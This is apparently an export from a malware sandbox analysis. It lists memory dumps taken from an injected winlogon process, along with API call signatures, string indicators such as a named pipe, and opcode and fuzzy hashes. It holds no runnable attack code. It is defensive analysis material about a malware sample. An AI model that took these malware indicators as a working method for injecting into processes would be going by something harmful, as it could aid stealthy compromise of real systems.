                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 93558ce561f458a496548046fa9771a477e4b847544d87466bd0439cd31ff69d
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: B2D1AC33A447888AFB62CB659540BDD77A0FB4578CF908119EA8957B96CB36C482C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 9fc1314c1b3568874932ff714da4d78103fade56a62ede063e1102c62ff8e334
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: E8D18B73A447888AFB22DF659540BDD7BA0FB4979DF900205EE8957B96CB35C480C783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction ID: db454895896c66f2aae9d4fb35f949d79ab27abdbeef052a67be09c4d4be01c7
                                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction Fuzzy Hash: E8D17C33A44B488AFB629F65D480BED77A0FB45B8CF900115EA8D57B96DB35C082C783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: 2003d48ef077ee33f5376efef2558062a00fd4140dc90c64e07b1c00940d858d
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 6541B133614B84DAF761CF22E44479E77A1F788B89F808119DA890B758DF3DC44ACB92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: 8a4b5a10e027ae3e9ee44e0ca111a6274b15f8be53a4c776a450907aef51b4fb
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 9A41A133614B88C6F761CF21E44479EB7A1F788B98F848119EA8907758DF3ED446CB92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: 6f63e4c53f789b41bcef94283b1f03cc38c3850ef35568dd7831dedf23a81aa2
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 9A41D073614B84CAF761CF21E404B9E77A1F788B89F808129DA8947758DF39C585CB82
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: b17e47fd4f1449c8d4acc04e3621050a468f068c5ba762e4a054dfaa74389b3f
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: BA116D32A18B5482F7118B21F41479B7760FB88BA8F944215EA5906AA8DF3DC146CBC2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: 4ae2b1dd0165a769ae8a6f1806b14cc66bc568eb7fc37f487b2a6e2550b0d5b4
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 6D117F32A18B4482F7118B21F854B997760FB88BD8FD44314EA5906AA8CF3DC146CBC6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$nya-childproc
                                                  • API String ID: 166002920-3933612297
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: 60ccf5d49717dcd0a93c838fa48479b51da98688de155bc44fd090f9c66e7f12
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 0E117C32A15B4482F7118B21F464B9A7760FB88BD8F940314EA5942AA8DF3DC145CB86
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: c017a9effcea72d85198735e9016d59a6dfb2979d59511daea1fd325c26afa1d
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: BF81D373E8034846FA53AB659441FD97290BF8578EFC840259A8877396DB3BC84787C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 2ef598056096b3bfdeabdf0bab39421e006454b166941b32e9cc3945e4c11726
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: AB817133E8034C96FA52AB659481BD97291BFC578CFD4C02DA98947796DB3BC84782C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 160e4b4da880ada073ff2f6592a37a3a82ede2845789ae4f7ceb2b1831bb5f15
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 4581E533E8034D46FA53AB659441FE97291BF8578EFC44114A98947796EB3BC846C3C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: 24616cbd0e12550494a136588df692ffe9cf0816aba21efa28764c3b263d334b
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 8881CF73F8434C46FA53AB6D9841BD93291BF8678CFD45025998C47396DA3BC882C783
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B31
                                                  • GetLastError.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000001CA7D299C6B,?,?,?,000001CA7D29945C,?,?,?,?,000001CA7D298F65), ref: 000001CA7D299BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: 45fd29a1b6800a1b48e2dad99402234d17b04da49f1f4772e7c302736c8b9013
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 1531B073A5270881FE13DB069810BE63398FF88BA9FA915249D1D5A794DA3EC44683C3
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B31
                                                  • GetLastError.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000001CA7D219C6B,?,?,?,000001CA7D21945C,?,?,?,?,000001CA7D218F65), ref: 000001CA7D219BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: 913e52812023985531484c69a56f4c057774ccded8e0e9709dbdd399596a43e9
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: 0731A333A5274881FE13DB069800BE53395BF44BA8FA98528AD2946794DE3BD54683C3
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B31
                                                  • GetLastError.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B3F
                                                  • LoadLibraryExW.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9B69
                                                  • FreeLibrary.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9BD7
                                                  • GetProcAddress.KERNEL32(?,?,?,000001CA7D1E9C6B,?,?,?,000001CA7D1E945C,?,?,?,?,000001CA7D1E8F65), ref: 000001CA7D1E9BE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction ID: e67ff9930da721277ed07b841fc38b7938dfad7609e3bd6cb6fbc50ffe571c68
                                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                  • Instruction Fuzzy Hash: C331B033A5674881FE139B429800FE53394FF44BA9F990624DD194B794EF3AC4448393
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 629538001b049afcf998d84a33afb03470eae8d162f95f7716f0bf9cb29571b7
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 99119333B54B4482F7528B52E854B5A76A0FBC8BE8F844214EE5D8BB94DF7AC40587C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction ID: 8aae48f47a9bb66e9edd86841ba13e019cb2a79eb4afd0458ea2895297c6a3c3
                                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                  • Instruction Fuzzy Hash: 8511B132B54B4482F3528B52F854B5976A4FB88BE8F814214EA5D87B94CF3AC50187C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
